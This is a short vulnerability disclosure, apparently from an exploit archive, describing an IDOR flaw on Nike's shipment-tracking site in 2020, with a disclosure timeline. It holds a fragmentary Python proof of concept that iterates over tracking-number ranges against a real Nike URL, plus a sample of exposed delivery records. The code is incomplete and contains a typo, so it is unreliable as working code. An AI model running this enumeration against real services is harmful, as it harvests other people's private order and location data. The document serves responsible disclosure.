Exploit Title: Nike.com - Insecure Direct Object Reference (IDOR).
Exploit Author: Nir Yehoshua.
Exploit Date: 2020-5-27.
Link to vulnerable website: https://www.nike.com
Category: Web Application.
Details: An IDOR vulnerability discovered at Nike.com website that can lead to sensitive information disclosure.
Proof of Concept (Python):
#Nike.com IDOR by Nir Yehoshua
URL = 'https://secure-global-tracking.nike.com/nike/tracking/%d'
for number in range(6001050010000, 6001056053999):
BaseRequest = URL % nunber
Date Time Description Location
2020-02-27 13:45 Delivered MORELIA-MEX
2020-02-27 13:13 Out for Delivery MORELIA-MEX
2020-02-26 11:06 Arrived at Transit Hub GUADALAJARA-MEX
2020-02-26 02:00 Customs Released CINCINNATI HUB,OH-USA
2020-02-25 21:35 In Transit to Destination Country BRUSSELS-BEL
2020-02-25 15:31 Departed Origin Country AMSTERDAM-NLD
2020-02-24 18:22 Pending customs release (Please allow 1-2 days)
2020-02-24 11:01 Arrived Destination Region/Country AMS
2020-02-24 10:58 General Update
2020-02-23 16:14 Departed International Hub
2020-02-23 15:59 Arrived International Hub
2020-02-23 11:01 Departed Origin Country AMS
2020-02-23 08:12 Packages Details Received – Awaiting Dispatch NL
* Date/Time values are local times where the activity is located
February 26th – Vulnerability reported to Nike.
February 28th – Initial response and vulnerability confirmation from Nike.
March 4th – Status update from Nike.
April 7th – An update email sent to Nike about the intention to disclose the vulnerability. No response from Nike.
May 27th – The vulnerability disclosed after 90 days of deadline that has given to Nike to patch the vulnerability.